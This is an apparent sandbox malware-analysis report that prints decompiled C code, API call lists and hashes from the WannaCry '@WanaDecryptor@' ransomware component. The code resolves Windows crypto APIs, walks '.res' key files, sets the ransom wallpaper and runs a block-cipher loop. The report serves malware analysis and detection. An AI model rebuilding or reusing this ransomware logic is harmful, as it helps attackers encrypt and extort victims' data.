                                                      • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
                                                      				int _t51;
                                                      				void* _t54;
                                                      				long _t55;
                                                      				signed int _t64;
                                                      				signed int _t68;
                                                      				void* _t71;
                                                      				int _t78;
                                                      				short _t86;
                                                      				signed int _t92;
                                                      				intOrPtr _t110;
                                                      				int _t121;
                                                      				void* _t122;
                                                      				void* _t123;
                                                      				void* _t126;
                                                      				void* _t128;
                                                      				intOrPtr _t129;
                                                      				void* _t130;
                                                      				void* _t132;
                                                      				void* _t134;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041365C);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t129;
                                                      				_t130 = _t129 - 0x2e4;
                                                      				_t110 = __ecx;
                                                      				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                                      				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                                      				if(_t51 != 0) {
                                                      					_t51 = OpenClipboard( *(_t110 + 0x20));
                                                      					if(_t51 != 0) {
                                                      						_t121 = 0;
                                                      						_t126 = 0;
                                                      						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                                      							do {
                                                      								_push(0);
                                                      								_t71 = _t130 + 0x18;
                                                      								_push(_t121);
                                                      								_push(_t71);
                                                      								L00412D7C();
                                                      								_push(0x4206e0);
                                                      								_push(_t71);
                                                      								_push(_t130 + 0x14);
                                                      								 *(_t130 + 0x308) = 0;
                                                      								L00412CCE();
                                                      								 *(_t130 + 0x2fc) = 2;
                                                      								L00412CC2();
                                                      								 *(_t130 + 0x2fc) = 0xffffffff;
                                                      								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                                      								L00412CC2();
                                                      								_t121 = _t121 + 1;
                                                      							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                                      						}
                                                      						_t122 = GlobalAlloc(2, _t126 + 2);
                                                      						 *(_t130 + 0x14) = _t122;
                                                      						if(_t122 != 0) {
                                                      							_t54 = GlobalLock(_t122);
                                                      							 *(_t130 + 0x10) = _t54;
                                                      							if(_t54 != 0) {
                                                      								_t78 = 0;
                                                      								_t128 = 0;
                                                      								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                                      								if(_t55 > 0) {
                                                      									while(1) {
                                                      										_push(0);
                                                      										_push(_t78);
                                                      										_push(_t130 + 0x24);
                                                      										L00412D7C();
                                                      										_push(0x4206e0);
                                                      										_push(_t55);
                                                      										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                                      										_push(_t130 + 0x24);
                                                      										L00412CCE();
                                                      										 *(_t130 + 0x2fc) = 5;
                                                      										L00412CC2();
                                                      										_t86 =  *0x42179c; // 0x0
                                                      										 *(_t130 + 0x24) = _t86;
                                                      										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                                      										_t132 = _t130 + 0xc;
                                                      										asm("stosw");
                                                      										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                                      										_t64 = wcslen(_t132 + 0x24);
                                                      										_t123 = _t132 + 0x28;
                                                      										_t92 = _t64 << 1 >> 2;
                                                      										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                                      										_t134 = _t132 + 0x18;
                                                      										_t68 = wcslen(_t134 + 0x28);
                                                      										_t130 = _t134 + 8;
                                                      										_t128 = _t128 + _t68 * 2;
                                                      										 *(_t130 + 0x2fc) = 0xffffffff;
                                                      										L00412CC2();
                                                      										_t78 = _t78 + 1;
                                                      										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                                      										if(_t78 >= _t55) {
                                                      											break;
                                                      										}
                                                      										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                                      									}
                                                      									_t122 =  *(_t130 + 0x14);
                                                      								}
                                                      								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                                      								GlobalUnlock(_t122);
                                                      								EmptyClipboard();
                                                      								SetClipboardData(0xd, _t122);
                                                      							} else {
                                                      								GlobalFree(_t122);
                                                      							}
                                                      						}
                                                      						_t51 = CloseClipboard();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                                      				return _t51;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                                      				void* _t31;
                                                      				int _t34;
                                                      				int _t37;
                                                      				intOrPtr _t39;
                                                      				int _t42;
                                                      				struct _WIN32_FIND_DATAA* _t54;
                                                      				void* _t75;
                                                      				struct _IO_FILE* _t76;
                                                      				struct _WIN32_FIND_DATAA* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t84;
                                                      
                                                      				_t54 = __ecx;
                                                      				_t79 = __ecx;
                                                      				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                                      				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                                      				 *(_t81 + 8) = _t31;
                                                      				if(_t31 != 0xffffffff) {
                                                      					goto L3;
                                                      					L14:
                                                      					_t75 =  *(_t81 + 0x14);
                                                      					_t54 = _t81 + 0xdc;
                                                      					if(FindNextFileA(_t75, _t54) != 0) {
                                                      						L3:
                                                      						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                                      								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                                      								_t81 = _t81 + 0xc;
                                                      								if(_t34 >= 1) {
                                                      									_t76 = fopen(_t81 + 0x108, "rb");
                                                      									_t81 = _t81 + 8;
                                                      									 *(_t81 + 0x18) = _t76;
                                                      									if(_t76 != 0) {
                                                      										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                                      										_t82 = _t81 + 0x10;
                                                      										if(_t37 == 1) {
                                                      											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                                      											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                                      											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                                      												if(_t39 != 0) {
                                                      													 *((char*)(_t82 + 0x21)) = 0x5c;
                                                      													 *((char*)(_t82 + 0x28)) = 0x5c;
                                                      													E00401C30(_t60, _t39, _t82 + 0x22);
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x143);
                                                      												} else {
                                                      													sprintf(_t82 + 0x20, "My Computer");
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x14a);
                                                      												}
                                                      												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                                      												_push(0x88);
                                                      												L00412CEC();
                                                      												_t84 = _t83 + 4;
                                                      												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                                      												_t82 = _t84 + 0xc;
                                                      												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                                      												_t76 =  *(_t82 + 0x18);
                                                      												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                                      											}
                                                      										}
                                                      										fclose(_t76);
                                                      										_t81 = _t82 + 4;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L14;
                                                      					} else {
                                                      						FindClose(_t75);
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
                                                      				_Unknown_base(*)()* _t9;
                                                      				struct HINSTANCE__* _t20;
                                                      
                                                      				if( *0x4217c0 == 0) {
                                                      					_t20 = LoadLibraryA("advapi32.dll");
                                                      					if(_t20 == 0) {
                                                      						L10:
                                                      						return 0;
                                                      					} else {
                                                      						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                                      						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                                      						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                                      						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                                      						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                                      						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                                      						 *0x4217d4 = _t9;
                                                      						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                                      							goto L10;
                                                      						} else {
                                                      							return 1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}






                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
                                                      				void _v518;
                                                      				short _v520;
                                                      				short _v540;
                                                      				void _v1038;
                                                      				char _v1040;
                                                      				long _v1060;
                                                      				void _v1558;
                                                      				short _v1560;
                                                      				long _v1580;
                                                      				int _t23;
                                                      				short _t39;
                                                      				void* _t42;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      
                                                      				_t39 =  *0x42179c; // 0x0
                                                      				_v1040 = _t39;
                                                      				memset( &_v1038, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v1560 = _t39;
                                                      				memset( &_v1558, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v520 = _t39;
                                                      				memset( &_v518, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
                                                      				_t23 = wcslen( &_v1060);
                                                      				_t54 =  &_v1560 + 0x28;
                                                      				if(_t23 != 0) {
                                                      					_push(L"@WanaDecryptor@.bmp");
                                                      					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                                      					_t55 = _t54 + 0x10;
                                                      					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                                      					CopyFileW( &_v540, _t55, 0);
                                                      					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                                      				} else {
                                                      					return _t23;
                                                      				}
                                                      			}


















                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E004067F0(void* __ecx) {
                                                      				signed int _v84;
                                                      				void* _v88;
                                                      				intOrPtr _v92;
                                                      				intOrPtr _v96;
                                                      				intOrPtr _v100;
                                                      				char _v104;
                                                      				int _t16;
                                                      				int _t21;
                                                      				int _t22;
                                                      				int _t37;
                                                      				struct tagRECT* _t48;
                                                      				void* _t56;
                                                      
                                                      				_t56 = __ecx;
                                                      				_t16 = IsIconic( *(__ecx + 0x20));
                                                      				if(_t16 == 0) {
                                                      					L00412CBC();
                                                      					return _t16;
                                                      				} else {
                                                      					_push(_t56);
                                                      					L00412DD0();
                                                      					asm("sbb eax, eax");
                                                      					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                                      					_t21 = GetSystemMetrics(0xb);
                                                      					_t22 = GetSystemMetrics(0xc);
                                                      					_t48 =  &_v104;
                                                      					GetClientRect( *(_t56 + 0x20), _t48);
                                                      					asm("cdq");
                                                      					asm("cdq");
                                                      					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                                      					L00412DB8();
                                                      					return _t37;
                                                      				}
                                                      			}
















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                      • String ID:
                                                      • API String ID: 1397574227-0
                                                      • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                                      • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                                      • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                                      				void* _v4;
                                                      				void* _v12;
                                                      				char _v16;
                                                      				void* _v20;
                                                      				char _v24;
                                                      				struct HWND__* _v32;
                                                      				WCHAR* _v36;
                                                      				struct HWND__* _t90;
                                                      				signed int* _t100;
                                                      				signed int _t102;
                                                      				signed int _t105;
                                                      				signed int* _t109;
                                                      				signed int _t113;
                                                      				signed int _t114;
                                                      				signed int _t121;
                                                      				void* _t124;
                                                      				signed int _t130;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				signed int _t143;
                                                      				signed int _t152;
                                                      				signed int _t157;
                                                      				void* _t185;
                                                      				void* _t188;
                                                      				signed int* _t191;
                                                      				void* _t204;
                                                      				signed int _t206;
                                                      				struct HWND__* _t207;
                                                      				void* _t211;
                                                      				void* _t212;
                                                      				void* _t217;
                                                      				void* _t218;
                                                      				signed int _t221;
                                                      				void* _t224;
                                                      				signed int* _t226;
                                                      				void* _t227;
                                                      				void* _t228;
                                                      
                                                      				_t228 = _t227 - 0xc;
                                                      				_t124 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      				}
                                                      				_t206 = _a12;
                                                      				_t185 = 0;
                                                      				if(_t206 == 0) {
                                                      					L26:
                                                      					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                                      					_push(0x41c9c0);
                                                      					_push( &_v16);
                                                      					L004130FC();
                                                      					_push(_t206);
                                                      					_t90 = FindWindowW(0, _v36); // executed
                                                      					_t207 = _t90;
                                                      					if(_t207 != 0) {
                                                      						_push(_t185);
                                                      						ShowWindow(_t207, 5);
                                                      						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      						SetForegroundWindow(_t207);
                                                      						SetFocus(_t207);
                                                      						SetActiveWindow(_t207);
                                                      						BringWindowToTop(_t207);
                                                      						_t90 = _v32;
                                                      						if(_t90 != 0) {
                                                      							ExitProcess(0);
                                                      						}
                                                      					}
                                                      					return _t90;
                                                      				} else {
                                                      					_t130 =  *(_t124 + 0x3cc);
                                                      					if(_t206 % _t130 != 0) {
                                                      						goto L26;
                                                      					} else {
                                                      						_t100 = _a16;
                                                      						if(_t100 != 1) {
                                                      							L13:
                                                      							_a16 = _t185;
                                                      							if(_t100 != 2) {
                                                      								L23:
                                                      								_t102 = _t206 / _t130;
                                                      								_t188 = _a4;
                                                      								_t221 = _a8;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									do {
                                                      										_push(_t221);
                                                      										_push(_t188);
                                                      										E0040B0C0(_t124);
                                                      										_t132 =  *(_t124 + 0x3cc);
                                                      										_t188 = _t188 + _t132;
                                                      										_t221 = _t221 + _t132;
                                                      										_a8 = _a8 + 1;
                                                      										_t105 = _t206 / _t132;
                                                      									} while (_a8 < _t105);
                                                      									return _t105;
                                                      								}
                                                      							} else {
                                                      								_t102 = _t206 / _t130;
                                                      								_t191 = _a8;
                                                      								_t224 = _a4;
                                                      								_a4 = _t191;
                                                      								if(_t102 <= 0) {
                                                      									goto L11;
                                                      								} else {
                                                      									while(1) {
                                                      										_t50 = _t124 + 0x3f0; // 0x444
                                                      										_push(_t191);
                                                      										E0040ADC0(_t124);
                                                      										_t109 = _t191;
                                                      										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      											break;
                                                      										}
                                                      										_t211 = 0;
                                                      										if( *(_t124 + 0x3cc) > 0) {
                                                      											do {
                                                      												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                                      												_t109 =  &(_t109[0]);
                                                      												_t211 = _t211 + 1;
                                                      											} while (_t211 <  *(_t124 + 0x3cc));
                                                      										}
                                                      										_t212 = _t224;
                                                      										_t56 = _t124 + 0x3f0; // 0x444
                                                      										_t138 =  *(_t124 + 0x3cc) >> 2;
                                                      										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                                      										_t228 = _t228 + 0x18;
                                                      										_t143 =  *(_t124 + 0x3cc);
                                                      										_t114 = _t113 / _t143;
                                                      										_t224 = _t224 + _t143;
                                                      										_v4 = _v4 + _t143;
                                                      										_t206 = _a8 + 1;
                                                      										_a8 = _t206;
                                                      										if(_t206 < _t114) {
                                                      											_t191 = _v4;
                                                      											continue;
                                                      										} else {
                                                      											return _t114;
                                                      										}
                                                      										goto L31;
                                                      									}
                                                      									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      									_t130 =  &_v24;
                                                      									_push(0x41c9c0);
                                                      									_push(_t130);
                                                      									L004130FC();
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t102 = _t206 / _t130;
                                                      							_t226 = _a8;
                                                      							_a16 = 0;
                                                      							if(_t102 <= 0) {
                                                      								L11:
                                                      								return _t102;
                                                      							} else {
                                                      								while(1) {
                                                      									_push(_t226);
                                                      									_push(_a4);
                                                      									E0040B0C0(_t124);
                                                      									_t100 = _t226;
                                                      									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      										break;
                                                      									}
                                                      									_t217 = 0;
                                                      									if( *(_t124 + 0x3cc) > 0) {
                                                      										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                                      										_t204 = _t22;
                                                      										do {
                                                      											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                                      											_t100 =  &(_t100[0]);
                                                      											_t217 = _t217 + 1;
                                                      										} while (_t217 <  *(_t124 + 0x3cc));
                                                      									}
                                                      									_t218 = _v4;
                                                      									_t27 = _t124 + 0x3f0; // 0x444
                                                      									_t152 =  *(_t124 + 0x3cc) >> 2;
                                                      									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                                      									_t228 = _t228 + 0x18;
                                                      									_t157 =  *(_t124 + 0x3cc);
                                                      									_t102 = _t121 / _t157;
                                                      									_t185 = _v4 + _t157;
                                                      									_t226 = _t226 + _t157;
                                                      									_t206 = _a8 + 1;
                                                      									_v4 = _t185;
                                                      									_a8 = _t206;
                                                      									if(_t206 < _t102) {
                                                      										continue;
                                                      									} else {
                                                      										goto L11;
                                                      									}
                                                      									goto L31;
                                                      								}
                                                      								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      								_t130 =  &_v24;
                                                      								_push(0x41c9c0);
                                                      								_push(_t130);
                                                      								L004130FC();
                                                      								goto L13;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L31:
                                                      			}








































                                                      0x0040b500
                                                      0x0040b504
                                                      0x0040b508
                                                      0x0040b50e
                                                      0x00000000
                                                      0x0040b510
                                                      0x0040b516
                                                      0x0040b516
                                                      0x0040b51c
                                                      0x0040b520
                                                      0x0040b528
                                                      0x0040b52c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b534
